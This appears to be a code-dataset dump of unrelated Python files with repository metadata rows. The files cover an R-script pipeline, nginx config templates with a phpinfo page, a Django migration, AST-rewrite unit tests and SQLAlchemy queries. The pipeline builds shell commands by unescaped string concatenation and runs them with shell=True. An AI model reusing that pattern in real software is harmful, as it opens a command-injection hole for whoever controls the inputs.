[(str(dd['ID_Analyte'][i]), csv_ds_root_path, params_file_path, output_dir) for i in range(num_analytes)])
# Below are the functions compatible with the Luigi pipeline
def generate_subprocess_call_for_a_analyte_luigi(hashed_id, csv_ds_root_path, params_file_path, output_dir):
""" Generates the command to be passed to the subprocess module.
The command is created for a given analyte.
:param str hashed_id: hashed id of the analyte
:param str csv_ds_root_path: path to the folder of temporary csv files
:param str params_file_path: path to the parameters file for the R script
:param str output_dir: output path of the 'ID_Analyte_glossary' file. This file contains the values of all
hashed ids and it is used as the _SUCCESS file
:returns: subprocess_call_for_r_script
"""
R_SCRIPT_PATH = os.getenv('R_SCRIPT_PATH')
local_path = os.getenv('local_path')
subprocess_call_for_r_script = str(
R_SCRIPT_PATH +
' "' + local_path + 'src/AvG_R_scripts/AvG_from_partitionedParquet.R' + '" ' +
' "' + local_path + csv_ds_root_path + 'data_analyte_' + str(hashed_id) + '.csv' + '" ' +
' "' + str(params_file_path) + '" ' +
' "' + str(hashed_id) + '" ' +
' "' + local_path + output_dir + '" ')
return subprocess_call_for_r_script
def run_r_script_for_an_analyte_luigi(hashed_id, csv_ds_root_path, params_file_path, output_dir):
""" Generates a command and passes it to the subprocess module.
The R script is run using the data for a analyte.
:param str hashed_id: hashed id of the analyte
:param str csv_ds_root_path: path to the folder of temporary csv files
:param str params_file_path: path to the parameters file for the R script
:param str output_dir: output path of the 'ID_Analyte_glossary' file. This file contains the values of all
hashed ids and it is used as the _SUCCESS file
"""
subprocess_call_for_r_script = generate_subprocess_call_for_a_analyte_luigi(
hashed_id, csv_ds_root_path, params_file_path, output_dir)
# print('subcall:' + subprocess_call_for_r_script)
subprocess.call(subprocess_call_for_r_script, shell=True)
def run_r_script_for_all_analytes_luigi(id_analyte_path,csv_ds_root_path, params_file_path, output_dir):
""" Run the avant-garde R script for all analytes. Reads the 'ID_Analyte_glossary' file, that contains all
hashed id values for all the analytes and iterates through it.
:param str id_analyte_path: output path of the 'ID_Analyte_glossary' file. This file contains the values of all
hashed id values.
:param str csv_ds_root_path: path to the folder of temporary csv files
:param str params_file_path: path to the parameters file for the R script
:param str output_dir: output path of the 'ID_Analyte_glossary' file that is used as a _SUCCESS file
to be written in R to make sure that the script ran without errors.
"""
dd = pd.read_csv(id_analyte_path)
pool = mp.Pool(mp.cpu_count())
num_analytes = len(dd['ID_Analyte'])
pool.starmap(run_r_script_for_an_analyte_luigi,
[(str(dd['ID_Analyte'][i]), csv_ds_root_path, params_file_path, output_dir) for i in range(num_analytes)])
| 43.818792 | 123 | 0.705162 | 1,026 | 6,529 | 4.179337 | 0.111111 | 0.055504 | 0.044076 | 0.063666 | 0.899021 | 0.891325 | 0.885961 | 0.883396 | 0.868237 | 0.850513 | 0 | 0 | 0.220401 | 6,529 | 148 | 124 | 44.114865 | 0.842436 | 0.51769 | 0 | 0.425532 | 1 | 0 | 0.088635 | 0.028234 | 0 | 0 | 0 | 0 | 0 | 1 | 0.12766 | false | 0 | 0.085106 | 0 | 0.255319 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
bfd189b447823268f020d99781429183ed4395e7 | 3,837 | py | Python | jennie/ubuntu/nginxfiles.py | Ask-Jennie/ask-jennie | 6980ca14f326a129ca03340bad24ecdc30fb966b | [
"MIT"
] | null | null | null | jennie/ubuntu/nginxfiles.py | Ask-Jennie/ask-jennie | 6980ca14f326a129ca03340bad24ecdc30fb966b | [
"MIT"
] | null | null | null | jennie/ubuntu/nginxfiles.py | Ask-Jennie/ask-jennie | 6980ca14f326a129ca03340bad24ecdc30fb966b | [
"MIT"
] | null | null | null | NGINX_PORT_CONF = '''server {
listen PORT;
index index.html index.htm index.nginx-debian.html index.php;
server_name DOMAIN;
location / {
root ROOT;
try_files $uri $uri/ =404;
}
}'''
NGINX_HTTP_CONF = '''server {
listen 80;
index index.html index.htm index.nginx-debian.html index.php;
server_name DOMAIN;
location / {
root ROOT;
try_files $uri $uri/ =404;
}
}'''
NGINX_HTTPS_CONF = '''server {
listen 443;
index index.html index.htm index.nginx-debian.html index.php;
server_name DOMAIN;
ssl on;
ssl_certificate /etc/letsencrypt/live/DOMAIN_NAME/fullchain.pem;
ssl_certificate_key /etc/letsencrypt/live/DOMAIN_NAME/privkey.pem;
location / {
root ROOT;
try_files $uri $uri/ =404;
}
}'''
DEFAULT_CONF = '''server {
listen 80;
root /var/www/html;
index index.html index.htm index.nginx-debian.html index.php;
server_name localhost;
location / {
try_files $uri $uri/ =404;
}
location ~ \.php$ {
include snippets/fastcgi-php.conf;
fastcgi_pass unix:/var/run/php/php7.2-fpm.sock;
}
}'''
DEFAULT_PHPMYADMIN_CONF = '''server {
listen 80;
root /var/www/html;
index index.php index.html index.htm index.nginx-debian.html;
server_name localhost;
location / {
try_files $uri $uri/ =404;
}
location ~ \.php$ {
include snippets/fastcgi-php.conf;
fastcgi_pass unix:/var/run/php/php7.2-fpm.sock;
}
}'''
KIBANA_CONF = '''server {
listen 8100;
server_name kibana;
location / {
proxy_pass http://localhost:5601;
proxy_http_version 1.1;
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection 'upgrade';
proxy_set_header Host $host;
proxy_cache_bypass $http_upgrade;
}
}'''
DJANGO_HTTPS_CONF = '''upstream backend {
server 127.0.0.1:PORT_EXCHANGE; # for a web port socket
}
server {
listen 443;
listen [::]:443;
server_name DOMAIN_NAME;
ssl on;
ssl_certificate /etc/letsencrypt/live/DOMAIN_NAME/fullchain.pem;
ssl_certificate_key /etc/letsencrypt/live/DOMAIN_NAME/privkey.pem;
charset utf-8;
#Max upload size
client_max_body_size 75M; # adjust to taste
# Finally, send all non-media requests to the Django server.
location / {
uwsgi_pass backend;
include /etc/nginx/uwsgi_params;
}
}'''
DJANGO_HTTP_CONF = '''upstream backend {
server 127.0.0.1:PORT_EXCHANGE; # for a web port socket
}
server {
listen 80;
listen [::]:80;
server_name DOMAIN_NAME;
charset utf-8;
#Max upload size
client_max_body_size 75M; # adjust to taste
# Finally, send all non-media requests to the Django server.
location / {
uwsgi_pass backend;
include /etc/nginx/uwsgi_params;
}
}'''
DJANGO_PORT_CONF = '''upstream backend {
server 127.0.0.1:PORT_EXCHANGE; # for a web port socket
}
server {
listen PORT;
listen [::]:PORT;
server_name DOMAIN_NAME;
charset utf-8;
#Max upload size
client_max_body_size 75M; # adjust to taste
# Finally, send all non-media requests to the Django server.
location / {
uwsgi_pass backend;
include /etc/nginx/uwsgi_params;
}
}'''
DEFAULT_PHP_PAGE = '''<?php
// Show all information, defaults to INFO_ALL
phpinfo();
?>
''' | 22.839286 | 74 | 0.569977 | 448 | 3,837 | 4.705357 | 0.216518 | 0.046964 | 0.045541 | 0.040323 | 0.790323 | 0.790323 | 0.790323 | 0.790323 | 0.757116 | 0.757116 | 0 | 0.029194 | 0.330467 | 3,837 | 168 | 75 | 22.839286 | 0.791359 | 0 | 0 | 0.677419 | 0 | 0 | 0.930693 | 0.147994 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.056452 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 7 |
44f672b2b8ba9e350cbdca01844685f64c772898 | 1,737 | py | Python | joplin/pages/event_page/migrations/0005_auto_20201102_2138.py | cityofaustin/joplin | 01424e46993e9b1c8e57391d6b7d9448f31d596b | [
"MIT"
] | 15 | 2018-09-27T07:36:30.000Z | 2021-08-03T16:01:21.000Z | joplin/pages/event_page/migrations/0005_auto_20201102_2138.py | cityofaustin/joplin | 01424e46993e9b1c8e57391d6b7d9448f31d596b | [
"MIT"
] | 183 | 2017-11-16T23:30:47.000Z | 2020-12-18T21:43:36.000Z | joplin/pages/event_page/migrations/0005_auto_20201102_2138.py | cityofaustin/joplin | 01424e46993e9b1c8e57391d6b7d9448f31d596b | [
"MIT"
] | 12 | 2017-12-12T22:48:05.000Z | 2021-03-01T18:01:24.000Z | # Generated by Django 2.2.16 on 2020-11-02 21:38
from django.db import migrations
import wagtail.core.fields
class Migration(migrations.Migration):
dependencies = [
('event_page', '0004_auto_20200928_1854'),
]
operations = [
migrations.AlterField(
model_name='eventpage',
name='description',
field=wagtail.core.fields.RichTextField(blank=True, help_text='Include any information people need to know, such as meeting agenda.', verbose_name='Description'),
),
migrations.AlterField(
model_name='eventpage',
name='description_ar',
field=wagtail.core.fields.RichTextField(blank=True, help_text='Include any information people need to know, such as meeting agenda.', null=True, verbose_name='Description'),
),
migrations.AlterField(
model_name='eventpage',
name='description_en',
field=wagtail.core.fields.RichTextField(blank=True, help_text='Include any information people need to know, such as meeting agenda.', null=True, verbose_name='Description'),
),
migrations.AlterField(
model_name='eventpage',
name='description_es',
field=wagtail.core.fields.RichTextField(blank=True, help_text='Include any information people need to know, such as meeting agenda.', null=True, verbose_name='Description'),
),
migrations.AlterField(
model_name='eventpage',
name='description_vi',
field=wagtail.core.fields.RichTextField(blank=True, help_text='Include any information people need to know, such as meeting agenda.', null=True, verbose_name='Description'),
),
]
| 43.425 | 185 | 0.66091 | 195 | 1,737 | 5.769231 | 0.287179 | 0.133333 | 0.090667 | 0.128889 | 0.841778 | 0.841778 | 0.841778 | 0.794667 | 0.794667 | 0.794667 | 0 | 0.024006 | 0.232585 | 1,737 | 39 | 186 | 44.538462 | 0.819955 | 0.026482 | 0 | 0.575758 | 1 | 0 | 0.319716 | 0.013618 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.060606 | 0 | 0.151515 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
781a3ff955e6e597c5b2a60eb8177fa8839231dc | 4,857 | py | Python | tests/simulator/test_rewrite_if.py | stklik/CREST | 7fd97c50b0c6c923e1c477105bed4f0ea032bb99 | [
"MIT"
] | 14 | 2019-08-06T10:17:46.000Z | 2022-03-13T12:50:59.000Z | tests/simulator/test_rewrite_if.py | stklik/CREST | 7fd97c50b0c6c923e1c477105bed4f0ea032bb99 | [
"MIT"
] | 16 | 2018-01-20T00:54:24.000Z | 2019-07-24T15:43:42.000Z | tests/simulator/test_rewrite_if.py | stklik/CREST | 7fd97c50b0c6c923e1c477105bed4f0ea032bb99 | [
"MIT"
] | 1 | 2021-02-01T15:33:24.000Z | 2021-02-01T15:33:24.000Z | import unittest
import ast
from crestdsl import sourcehelper as SH
from crestdsl.simulation.to_z3 import *
import logging
logging.basicConfig(level=logging.INFO) # basic logging level
class TestRewriteIf(unittest.TestCase):
def test_rewrite_single_if_copy_following_to_both_structural_check(self):
def update(self, dt):
y = 1
x = 22
if x < 30:
y = 50
else:
y = 100.5
y += 3
return y * 4
up_ast = SH.get_ast_from_function_definition(update)
SH.RewriteIfElse().walk(up_ast)
SH.add_parent_info(up_ast)
# assert that y += 3 and return have been copied to then and to else
ifnode = up_ast.body[2]
then, orelse = ifnode.body, ifnode.orelse
assert len(then) == 3, "then-branch has correct number of statements"
assert len(orelse) == 3, "else-branch has correct number of statements"
assert isinstance(then[1], ast.AugAssign), "AugAssign has not been copied to then-branch"
assert isinstance(orelse[1], ast.AugAssign), "AugAssign has not been copied to else-branch"
assert isinstance(then[2], ast.Return), "Return has not been copied to then-branch"
assert isinstance(orelse[2], ast.Return), "Return has not been copied to else-branch"
def test_rewrite_single_if_copy_following_to_body_structural_check(self):
def update(self, dt):
y = 1
x = 22
if x < 30:
y = 50
else:
return 100.5
y += 3
return y * 4
up_ast = SH.get_ast_from_function_definition(update)
SH.RewriteIfElse().walk(up_ast)
SH.add_parent_info(up_ast)
ifnode = up_ast.body[2]
then, orelse = ifnode.body, ifnode.orelse
assert len(then) == 3, "then-branch has correct number of statements"
assert len(orelse) == 1, "else-branch has correct number of statements"
assert isinstance(then[1], ast.AugAssign), "AugAssign has not been copied to then-branch"
assert isinstance(then[2], ast.Return), "Return has not been copied to then-branch"
assert isinstance(orelse[0], ast.Return), "else-branch statement is a return (just as the original)"
def test_rewrite_nested_if_copy_following_to_body_structural_check(self):
def update(self, dt):
y = 1
x = 22
if x < 30:
if y < 50:
y = 50
else:
y -= 15
else:
if y < 50:
y = 44
else:
y -= 15
return y + 100.5
y += 3
return y * 4
up_ast = SH.get_ast_from_function_definition(update)
SH.RewriteIfElse().walk(up_ast)
SH.add_parent_info(up_ast)
ifnode = up_ast.body[2]
then, orelse = ifnode.body, ifnode.orelse
assert len(then) == 1, "then-branch has correct number of statements"
assert len(orelse) == 1, "else-branch has correct number of statements"
assert len(then[0].body) == 3, "then-then-branch has correct number of statements"
assert len(then[0].orelse) == 3, "then-then-branch has correct number of statements"
assert len(orelse[0].body) == 3, "else-then-branch has correct number of statements"
assert len(orelse[0].orelse) == 2, "then-then-branch has correct number of statements"
def test_rewrite_nested_if_copy_subpart_following_to_nested_body_structural_check(self):
def update(self, dt):
y = 1
x = 22
if x < 30:
if y < 50:
y = 50
else:
y -= 15
x += 22
return x
else:
if y < 50:
y = 44
return y
else:
y -= 15
return y + 100.5
up_ast = SH.get_ast_from_function_definition(update)
SH.RewriteIfElse().walk(up_ast)
SH.add_parent_info(up_ast)
ifnode = up_ast.body[2]
then, orelse = ifnode.body, ifnode.orelse
assert len(then) == 1, "then-branch has correct number of statements"
assert len(orelse) == 1, "else-branch has correct number of statements"
assert len(then[0].body) == 3, "then-then-branch has correct number of statements"
assert len(then[0].orelse) == 3, "then-then-branch has correct number of statements"
assert len(orelse[0].body) == 2, "else-then-branch has correct number of statements"
assert len(orelse[0].orelse) == 2, "then-then-branch has correct number of statements"
if __name__ == '__main__':
unittest.main()
| 38.547619 | 108 | 0.578135 | 642 | 4,857 | 4.238318 | 0.133956 | 0.029401 | 0.094083 | 0.129364 | 0.864756 | 0.864756 | 0.83903 | 0.822492 | 0.801544 | 0.774348 | 0 | 0.0336 | 0.332098 | 4,857 | 125 | 109 | 38.856 | 0.805179 | 0.017706 | 0 | 0.775701 | 0 | 0 | 0.222945 | 0 | 0 | 0 | 0 | 0 | 0.214953 | 1 | 0.074766 | false | 0 | 0.046729 | 0 | 0.205607 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
786cd8372dd9912051aaf53ad3b8f454c114b3db | 30,896 | py | Python | SBaaS_quantification/stage01_quantification_physiologicalRatios_query.py | dmccloskey/SBaaS_quantification | b2a9c7a9a0d318f22ff20e311f94c213852ba914 | [
"MIT"
] | null | null | null | SBaaS_quantification/stage01_quantification_physiologicalRatios_query.py | dmccloskey/SBaaS_quantification | b2a9c7a9a0d318f22ff20e311f94c213852ba914 | [
"MIT"
] | null | null | null | SBaaS_quantification/stage01_quantification_physiologicalRatios_query.py | dmccloskey/SBaaS_quantification | b2a9c7a9a0d318f22ff20e311f94c213852ba914 | [
"MIT"
] | null | null | null | #lims
from SBaaS_LIMS.lims_experiment_postgresql_models import *
from SBaaS_LIMS.lims_sample_postgresql_models import *
from .stage01_quantification_physiologicalRatios_postgresql_models import *
from SBaaS_base.sbaas_base_query_update import sbaas_base_query_update
from SBaaS_base.sbaas_base_query_drop import sbaas_base_query_drop
from SBaaS_base.sbaas_base_query_initialize import sbaas_base_query_initialize
from SBaaS_base.sbaas_base_query_insert import sbaas_base_query_insert
from SBaaS_base.sbaas_base_query_select import sbaas_base_query_select
from SBaaS_base.sbaas_base_query_delete import sbaas_base_query_delete
from SBaaS_base.sbaas_template_query import sbaas_template_query
class stage01_quantification_physiologicalRatios_query(sbaas_template_query):
def initialize_supportedTables(self):
'''Set the supported tables dict for
'''
tables_supported = {'data_stage01_quantification_physiologicalRatios_averages':data_stage01_quantification_physiologicalRatios_averages,
'data_stage01_quantification_physiologicalRatios_replicates':data_stage01_quantification_physiologicalRatios_replicates,
};
self.set_supportedTables(tables_supported);
# Query sample names from data_stage01_quantification_physiologicalRatios_replicates
def get_sampleNameAbbreviations_experimentID_dataStage01PhysiologicalRatiosReplicates(self,experiment_id_I,exp_type_I=4):
'''Querry sample names (i.e. unknowns) that are used from
the experiment'''
try:
sample_names = self.session.query(sample_description.sample_name_abbreviation).filter(
data_stage01_quantification_physiologicalRatios_replicates.experiment_id.like(experiment_id_I),
data_stage01_quantification_physiologicalRatios_replicates.sample_name_short.like(sample_description.sample_name_short),
experiment.exp_type_id == exp_type_I,
experiment.id.like(experiment_id_I),
experiment.sample_name.like(sample.sample_name),
sample.sample_id.like(sample_description.sample_id),
data_stage01_quantification_physiologicalRatios_replicates.used_.is_(True)).group_by(
sample_description.sample_name_abbreviation).order_by(
sample_description.sample_name_abbreviation.asc()).all();
sample_names_O = [];
for sn in sample_names: sample_names_O.append(sn.sample_name_abbreviation);
return sample_names_O;
except SQLAlchemyError as e:
print(e);
def get_sampleNameShort_experimentIDAndSampleNameAbbreviationAndRatioIDAndTimePoint_dataStage01PhysiologicalRatiosReplicates(self,experiment_id_I,sample_name_abbreviation_I,physiologicalratio_id_I,time_point_I,exp_type_I=4):
'''Querry sample names that are used from the experiment by sample name abbreviation and sample description'''
try:
sample_names = self.session.query(data_stage01_quantification_physiologicalRatios_replicates.sample_name_short).filter(
sample_description.sample_name_abbreviation.like(sample_name_abbreviation_I),
sample_description.time_point.like(time_point_I),
experiment.exp_type_id == exp_type_I,
experiment.id.like(experiment_id_I),
experiment.sample_name.like(sample.sample_name),
sample.sample_id.like(sample_description.sample_id),
data_stage01_quantification_physiologicalRatios_replicates.time_point.like(time_point_I),
data_stage01_quantification_physiologicalRatios_replicates.experiment_id.like(experiment_id_I),
data_stage01_quantification_physiologicalRatios_replicates.physiologicalratio_id.like(physiologicalratio_id_I),
data_stage01_quantification_physiologicalRatios_replicates.sample_name_short.like(sample_description.sample_name_short),
data_stage01_quantification_physiologicalRatios_replicates.used_.is_(True)).group_by(
data_stage01_quantification_physiologicalRatios_replicates.sample_name_short).order_by(
data_stage01_quantification_physiologicalRatios_replicates.sample_name_short.asc()).all();
sample_names_short_O = [];
for sn in sample_names: sample_names_short_O.append(sn.sample_name_short);
return sample_names_short_O;
except SQLAlchemyError as e:
print(e);
# Query time points from data_stage01_quantification_physiologicalRatios_replicates
def get_timePoint_experimentIDAndSampleNameAbbreviation_dataStage01PhysiologicalRatiosReplicates(self,experiment_id_I,sample_name_abbreviation_I,exp_type_I=4):
'''Querry time points that are used from the experiment'''
try:
time_points = self.session.query(data_stage01_quantification_physiologicalRatios_replicates.time_point).filter(
sample_description.sample_name_abbreviation.like(sample_name_abbreviation_I),
data_stage01_quantification_physiologicalRatios_replicates.experiment_id.like(experiment_id_I),
experiment.exp_type_id == exp_type_I,
experiment.id.like(experiment_id_I),
experiment.sample_name.like(sample.sample_name),
sample.sample_id.like(sample_description.sample_id),
sample_description.sample_name_short.like(data_stage01_quantification_physiologicalRatios_replicates.sample_name_short),
sample_description.time_point.like(data_stage01_quantification_physiologicalRatios_replicates.time_point),
data_stage01_quantification_physiologicalRatios_replicates.used_.is_(True)).group_by(
data_stage01_quantification_physiologicalRatios_replicates.time_point).order_by(
data_stage01_quantification_physiologicalRatios_replicates.time_point.asc()).all();
time_points_O = [];
for tp in time_points: time_points_O.append(tp.time_point);
return time_points_O;
except SQLAlchemyError as e:
print(e);
def get_timePoint_experimentID_dataStage01PhysiologicalRatiosReplicates(self,experiment_id_I):
'''Querry time points that are used from the experiment'''
try:
time_points = self.session.query(data_stage01_quantification_physiologicalRatios_replicates.time_point).filter(
data_stage01_quantification_physiologicalRatios_replicates.experiment_id.like(experiment_id_I),
data_stage01_quantification_physiologicalRatios_replicates.used_.is_(True)).group_by(
data_stage01_quantification_physiologicalRatios_replicates.time_point).order_by(
data_stage01_quantification_physiologicalRatios_replicates.time_point.asc()).all();
time_points_O = [];
for tp in time_points: time_points_O.append(tp.time_point);
return time_points_O;
except SQLAlchemyError as e:
print(e);
def get_timePoint_experimentIDAndRatioID_dataStage01PhysiologicalRatiosReplicates(self,experiment_id_I,physiologicalratio_id_I):
'''Querry time points that are used from the experiment'''
try:
time_points = self.session.query(data_stage01_quantification_physiologicalRatios_replicates.time_point).filter(
data_stage01_quantification_physiologicalRatios_replicates.experiment_id.like(experiment_id_I),
data_stage01_quantification_physiologicalRatios_replicates.physiologicalratio_id.like(physiologicalratio_id_I),
data_stage01_quantification_physiologicalRatios_replicates.used_.is_(True)).group_by(
data_stage01_quantification_physiologicalRatios_replicates.time_point).order_by(
data_stage01_quantification_physiologicalRatios_replicates.time_point.asc()).all();
time_points_O = [];
for tp in time_points: time_points_O.append(tp.time_point);
return time_points_O;
except SQLAlchemyError as e:
print(e);
# Query data from data_stage01_quantification_physiologicalRatios_replicates
def get_ratio_experimentIDAndSampleNameShortAndTimePointAndRatioID_dataStage01PhysiologicalRatiosReplicates(self, experiment_id_I, sample_name_short_I, time_point_I, physiologicalratio_id_I):
"""Query calculated ratios"""
try:
data = self.session.query(data_stage01_quantification_physiologicalRatios_replicates.physiologicalratio_value).filter(
data_stage01_quantification_physiologicalRatios_replicates.experiment_id.like(experiment_id_I),
data_stage01_quantification_physiologicalRatios_replicates.sample_name_short.like(sample_name_short_I),
data_stage01_quantification_physiologicalRatios_replicates.time_point.like(time_point_I),
data_stage01_quantification_physiologicalRatios_replicates.physiologicalratio_id.like(physiologicalratio_id_I),
data_stage01_quantification_physiologicalRatios_replicates.used_.is_(True)).all();
if len(data)>1:
print('more than 1 calculated_concentration retrieved per component_name')
if data:
ratio_O = data[0][0];
else:
ratio_O = None;
return ratio_O;
except SQLAlchemyError as e:
print(e);
def get_ratios_experimentIDAndSampleNameAbbreviationAndTimePointAndRatioID_dataStage01PhysiologicalRatiosReplicates(self, experiment_id_I, sample_name_abbreviation_I, time_point_I, physiologicalratio_id_I,exp_type_I=4):
"""Query calculated ratios"""
try:
data = self.session.query(data_stage01_quantification_physiologicalRatios_replicates.physiologicalratio_value).filter(
sample_description.sample_name_abbreviation.like(sample_name_abbreviation_I),
sample_description.time_point.like(time_point_I),
experiment.exp_type_id == exp_type_I,
experiment.id.like(experiment_id_I),
experiment.sample_name.like(sample.sample_name),
sample.sample_id.like(sample_description.sample_id),
data_stage01_quantification_physiologicalRatios_replicates.sample_name_short.like(sample_description.sample_name_short),
data_stage01_quantification_physiologicalRatios_replicates.experiment_id.like(experiment_id_I),
data_stage01_quantification_physiologicalRatios_replicates.time_point.like(time_point_I),
data_stage01_quantification_physiologicalRatios_replicates.physiologicalratio_id.like(physiologicalratio_id_I),
data_stage01_quantification_physiologicalRatios_replicates.used_.is_(True)).group_by(
data_stage01_quantification_physiologicalRatios_replicates.physiologicalratio_value).all();
ratios_O = [];
for d in data:
ratios_O.append(d[0]);
return ratios_O;
except SQLAlchemyError as e:
print(e);
def get_rows_experimentIDAndSampleNameAbbreviationAndTimePointAndRatioID_dataStage01PhysiologicalRatiosReplicates(self, experiment_id_I, sample_name_abbreviation_I, time_point_I, physiologicalratio_id_I,exp_type_I=4):
"""Query rows from data_stage01_physiologicalRatios_replicates"""
try:
data = self.session.query(data_stage01_quantification_physiologicalRatios_replicates).filter(
sample_description.sample_name_abbreviation.like(sample_name_abbreviation_I),
sample_description.time_point.like(time_point_I),
experiment.exp_type_id == exp_type_I,
experiment.id.like(experiment_id_I),
experiment.sample_name.like(sample.sample_name),
sample.sample_id.like(sample_description.sample_id),
data_stage01_quantification_physiologicalRatios_replicates.sample_name_short.like(sample_description.sample_name_short),
data_stage01_quantification_physiologicalRatios_replicates.experiment_id.like(experiment_id_I),
data_stage01_quantification_physiologicalRatios_replicates.time_point.like(time_point_I),
data_stage01_quantification_physiologicalRatios_replicates.physiologicalratio_id.like(physiologicalratio_id_I),
data_stage01_quantification_physiologicalRatios_replicates.used_.is_(True)).all();
rows_O = [];
if data:
for d in data:
rows_O.append({'experiment_id':d.experiment_id,
'sample_name_short':d.sample_name_short,
'time_point':d.time_point,
'physiologicalratio_id':d.physiologicalratio_id,
'physiologicalratio_name':d.physiologicalratio_name,
'physiologicalratio_value':d.physiologicalratio_value,
'physiologicalratio_description':d.physiologicalratio_description,
'used_':d.used_,
'comment_':d.comment_});
return rows_O;
except SQLAlchemyError as e:
print(e);
def get_rows_experimentIDAndSampleNameShortAndTimePoint_dataStage01PhysiologicalRatiosReplicates(self, experiment_id_I, sample_name_short_I, time_point_I):
"""Query rows from data_stage01_physiologicalRatios_replicates"""
try:
data = self.session.query(data_stage01_quantification_physiologicalRatios_replicates).filter(
data_stage01_quantification_physiologicalRatios_replicates.experiment_id.like(experiment_id_I),
data_stage01_quantification_physiologicalRatios_replicates.sample_name_short.like(sample_name_short_I),
data_stage01_quantification_physiologicalRatios_replicates.time_point.like(time_point_I),
data_stage01_quantification_physiologicalRatios_replicates.used_.is_(True)).all();
rows_O = [];
if data:
for d in data:
rows_O.append({'experiment_id':d.experiment_id,
'sample_name_short':d.sample_name_short,
'time_point':d.time_point,
'physiologicalratio_id':d.physiologicalratio_id,
'physiologicalratio_name':d.physiologicalratio_name,
'physiologicalratio_value':d.physiologicalratio_value,
'physiologicalratio_description':d.physiologicalratio_description,
'used_':d.used_,
'comment_':d.comment_});
return rows_O;
except SQLAlchemyError as e:
print(e);
# Query ratio_id information from data_stage01_quantificaton_physiologicalRatios_replicates
def get_ratioIDs_experimentIDAndTimePoint_dataStage01PhysiologicalRatiosReplicates(self,experiment_id_I,time_point_I):
'''Query physiologicalRatio_ids that are used from the experiment by time_point'''
try:
ratios = self.session.query(data_stage01_quantification_physiologicalRatios_replicates.physiologicalratio_id,
data_stage01_quantification_physiologicalRatios_replicates.physiologicalratio_name,
data_stage01_quantification_physiologicalRatios_replicates.physiologicalratio_description).filter(
data_stage01_quantification_physiologicalRatios_replicates.time_point.like(time_point_I),
data_stage01_quantification_physiologicalRatios_replicates.experiment_id.like(experiment_id_I),
data_stage01_quantification_physiologicalRatios_replicates.used_.is_(True)).group_by(
data_stage01_quantification_physiologicalRatios_replicates.physiologicalratio_id,
data_stage01_quantification_physiologicalRatios_replicates.physiologicalratio_name,
data_stage01_quantification_physiologicalRatios_replicates.physiologicalratio_description).order_by(
data_stage01_quantification_physiologicalRatios_replicates.physiologicalratio_id.asc()).all();
ratios_O = {};
for r in ratios:
ratios_O[r.physiologicalratio_id] = {'name':r.physiologicalratio_name,
'description':r.physiologicalratio_description};
return ratios_O;
except SQLAlchemyError as e:
print(e);
def get_ratioIDs_experimentID_dataStage01PhysiologicalRatiosReplicates(self,experiment_id_I):
'''Query physiologicalRatio_ids that are used from the experiment'''
try:
ratios = self.session.query(data_stage01_quantification_physiologicalRatios_replicates.physiologicalratio_id,
data_stage01_quantification_physiologicalRatios_replicates.physiologicalratio_name,
data_stage01_quantification_physiologicalRatios_replicates.physiologicalratio_description).filter(
data_stage01_quantification_physiologicalRatios_replicates.experiment_id.like(experiment_id_I),
data_stage01_quantification_physiologicalRatios_replicates.used_.is_(True)).group_by(
data_stage01_quantification_physiologicalRatios_replicates.physiologicalratio_id,
data_stage01_quantification_physiologicalRatios_replicates.physiologicalratio_name,
data_stage01_quantification_physiologicalRatios_replicates.physiologicalratio_description).order_by(
data_stage01_quantification_physiologicalRatios_replicates.physiologicalratio_id.asc()).all();
ratios_O = {};
for r in ratios:
ratios_O[r.physiologicalratio_id] = {'name':r.physiologicalratio_name,
'description':r.physiologicalratio_description};
return ratios_O;
except SQLAlchemyError as e:
print(e);
# Query time points from data_stage01_quantification_physiologicalRatios_averages
def get_timePoint_experimentID_dataStage01PhysiologicalRatiosAverages(self,experiment_id_I):
'''Querry time points that are used from the experiment'''
try:
time_points = self.session.query(data_stage01_quantification_physiologicalRatios_averages.time_point).filter(
data_stage01_quantification_physiologicalRatios_averages.experiment_id.like(experiment_id_I),
data_stage01_quantification_physiologicalRatios_averages.used_.is_(True)).group_by(
data_stage01_quantification_physiologicalRatios_averages.time_point).order_by(
data_stage01_quantification_physiologicalRatios_averages.time_point.asc()).all();
time_points_O = [];
for tp in time_points: time_points_O.append(tp.time_point);
return time_points_O;
except SQLAlchemyError as e:
print(e);
# Query sample names from data_stage01_quantification_physiologicalRatios_averages
def get_sampleNameAbbreviations_experimentIDAndTimePoint_dataStage01PhysiologicalRatiosAverages(self,experiment_id_I,time_point_I):
'''Querry sample names (i.e. unknowns) that are used from
the experiment'''
try:
sample_names = self.session.query(data_stage01_quantification_physiologicalRatios_averages.sample_name_abbreviation).filter(
data_stage01_quantification_physiologicalRatios_averages.experiment_id.like(experiment_id_I),
data_stage01_quantification_physiologicalRatios_averages.time_point.like(time_point_I),
data_stage01_quantification_physiologicalRatios_averages.used_.is_(True)).group_by(
data_stage01_quantification_physiologicalRatios_averages.sample_name_abbreviation).order_by(
data_stage01_quantification_physiologicalRatios_averages.sample_name_abbreviation.asc()).all();
sample_names_O = [];
for sn in sample_names: sample_names_O.append(sn.sample_name_abbreviation);
return sample_names_O;
